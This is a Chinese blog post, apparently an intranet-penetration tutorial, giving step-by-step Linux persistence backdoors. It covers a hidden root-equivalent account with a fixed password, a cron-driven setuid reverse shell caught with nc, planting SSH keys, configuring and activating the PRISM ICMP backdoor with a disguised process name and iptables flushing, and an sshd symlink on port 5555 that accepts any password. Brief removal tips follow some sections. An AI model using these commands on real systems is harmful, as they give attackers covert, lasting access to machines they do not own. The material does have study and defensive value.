Linux持续化后门

Linux权限维持

环境:Centos7、Kali虚拟机等

 

1、增加超级用户

useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test

Linux持续化后门_第1张图片

通过命令创建了test 123456的超级用户

 

2、unix bash远控后门

先创建/etc/...脚本文件

Linux持续化后门_第2张图片

授予权限chmod +sx /etc/...

修改/etc/crontab,加入*/1 * * * * root /etc/xxxx,让它每一分钟执行一次

重启crond服务,systemctl restart crond

在自己的机器用nc接收shell

Linux持续化后门_第3张图片

 

3、ssh公钥免密

通过把公钥添加到被控端的authorized_keys里面就能实现免密登录

Linux持续化后门_第4张图片

但是只要运维不傻,这个还是很容易被发现的

Linux持续化后门_第5张图片

 

4、ICMP后门

在控制端下载脚本:git clone https://github.com/andreafabrizi/prism.git

git下来之后,还需要进行编辑操作

先编辑prism.c,修改宏定义部分:

Linux持续化后门_第6张图片

40 #ifdef STATIC

41 # define REVERSE_HOST     "10.0.0.1"  //连接到主控机的IP地址

42 # define REVERSE_PORT     19832   //连接到主控机的端口号

43 # define RESPAWN_DELAY    15  //后门机尝试连接的空闲时间间隔

44 #else

45 # define ICMP_PACKET_SIZE 1024  //ICMP数据包的大小

46 # define ICMP_KEY         "linger"  //连接的密码

47 #endif

48

49 #define VERSION          "0.5"   //版本信息

50 #define MOTD             "PRISM v"VERSION" started\n\n# "  //后门机连接时显示的消息

51 #define SHELL            "/bin/sh"  //shell执行的位置

52 #define PROCESS_NAME     "udevd"   //创建的进程名称

交叉编译prism后门

gcc <..OPTIONS..> -Wall -s -o prism prism.c

可用的参数

-DDETACH //后台运行

-DSTATIC //只用STATIC模式(默认是ICMP模式)

-DNORENAME //不再重命名进程名

-DIPTABLES //清除所有iptables规则表项

如:gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

编译好之后把prism上传到远程后门主机,再运行sendPacket.py脚本,需要root权限。最好就是将prism.c文件上传到后门主机再进行编译,这样更容易成功。

在攻击者机器上运行nc等待后门的连接:nc -l -p 6666

使用sendPacket.py脚本(或其他数据包生成器)将激活数据包发送到后门:

./sendPacket.py 192.168.30.141 123456 192.168.30.131 6666

192.168.30.141 是运行棱镜后门的受害者机器

123456是密钥

192.168.30.131是攻击者机器地址

6666是攻击者机器端口

Linux持续化后门_第7张图片

这种后门方式对于采用了很多限制比如限制了ssh的远程服务器来说,是比较不错的,而且prism服务端运行后会在后门一直运行,除非重启服务器。所以运行后门后删除自身文件将不容易被发现。

清除方式

因为该后门重启会失效,除非写在开机启动项里,所以首先要检查启动项有没有异常情况,比如/etc/rc.local是否有未知的启动脚本

其次,这个后门可以改变后门进程名,但是还是有进程存在,所以要查出这个未知进程,可以用工具查找,kill掉

然后,该后门是使用了icmp的ping包激活的,所以可以过滤icmp包

最后,需要设置好严格的iptables规则,这个后门可以按照攻击者的设置尝试清楚iptables规则,需要定期查看iptables规则是否正常。

 

5、ssh软链接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

关键在于-oPort=5555开启了一个端口为5555的服务

直接ssh连接5555端口,密码随便输入,但是有些机器是限制了远程登录ssh的账号

Linux持续化后门_第8张图片

主要是利用了sshd的pam认证,调用/etc/pam.d/su

清除方式

netstat -anopt

Linux持续化后门_第9张图片

查看相关pid、tmp/su权限、kill pid、删除tmp/su

Linux持续化后门_第10张图片

 

你可能感兴趣的:(内网渗透)